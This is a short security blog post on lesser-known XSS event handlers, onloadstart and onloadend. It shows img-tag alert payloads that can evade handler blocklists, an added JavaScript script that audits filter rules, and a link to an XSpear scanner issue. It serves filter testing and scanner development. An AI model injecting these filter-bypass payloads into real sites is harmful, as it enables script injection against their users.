8/04/2019

onload* (start/end) event handler XSS (any browser)

Hi hackers.
Last time I wrote about onpointer* XSS. This time I'm writing about another not well-known event handler for XSS.
(https://www.hahwul.com/2019/07/onpoint-xss-payload-for-bypass-xss-protection.html)

onload* event handler for XSS

It's the onload* handler!
Handlers that start with onload are usually well known, but onloadstart and onloadend are not.

<!-- onloadstart -->
<!-- Any browser, but not with the <img> tag -->
<img src="https://1.bp.blogspot.com/-VkTsdecsLiI/XQOmG8rqvyI/AAAAAAAAEPk/9XBkwoAfmXE1KSHlqwF5cROFfgxUtDF_gCLcBGAs/s640/hahwul.gif" onloadstart="alert(45)">

<!-- onloadend -->
<!-- Firefox only -->
<img src="https://1.bp.blogspot.com/-VkTsdecsLiI/XQOmG8rqvyI/AAAAAAAAEPk/9XBkwoAfmXE1KSHlqwF5cROFfgxUtDF_gCLcBGAs/s640/hahwul.gif" onloadend="alert(45)">

I tested onloadstart on my site. It works!

But only in Firefox.
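
From the filtering side, this is why a list of well-known handlers does not cover onloadstart and onloadend. The script below is an added example, not code from the original post or from XSpear; BLOCKLIST, the function names and the sample tags (with a placeholder x.gif source) are assumptions made for illustration.

```javascript
// Added example (not from the original post): audit event-handler attributes.
// BLOCKLIST is a hypothetical filter list holding only well-known handlers.
const BLOCKLIST = new Set(["onload", "onerror", "onclick", "onmouseover"]);

// Collect attribute names from every start tag. Quoted values are consumed
// whole, so text inside a value is never mistaken for an attribute name.
function attributeNames(html) {
  const tagRe = /<[a-zA-Z][^\s\/>]*((?:"[^"]*"|'[^']*'|[^>"'])*)>/g;
  const attrRe = /([^\s"'<>\/=]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?/g;
  const names = [];
  for (const tag of html.matchAll(tagRe)) {
    for (const attr of tag[1].matchAll(attrRe)) {
      names.push(attr[1].toLowerCase());
    }
  }
  return names;
}

// Blocklist check: reports only the handlers someone remembered to list.
function blocklistHits(html) {
  return attributeNames(html).filter((name) => BLOCKLIST.has(name));
}

// Prefix check: every attribute beginning with "on" counts as a handler.
function handlerHits(html) {
  return attributeNames(html).filter((name) => name.startsWith("on"));
}

// Constructed samples: the post's two handlers, one well-known handler,
// and a harmless tag whose alt text merely contains "onloadend=".
const SAMPLES = [
  '<img src="x.gif" onloadstart="alert(45)">',
  '<img src="x.gif" onloadend="alert(45)">',
  '<img src="x.gif" onload="alert(45)">',
  '<img src="x.gif" alt="onloadend=1">',
];

for (const html of SAMPLES) {
  console.log(html, "| blocklist:", blocklistHits(html), "| prefix:", handlerHits(html));
}
```

This is an audit check for filter rules, not a sanitizer; output that must carry user-supplied markup is better handled by an allowlist-based HTML sanitizer built on a real parser.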

for XSpear

Add event handler pattern!
https://github.com/hahwul/XSpear/issues/18

You're welcome
(Image from giphy.com)




HAHWUL

@hahwul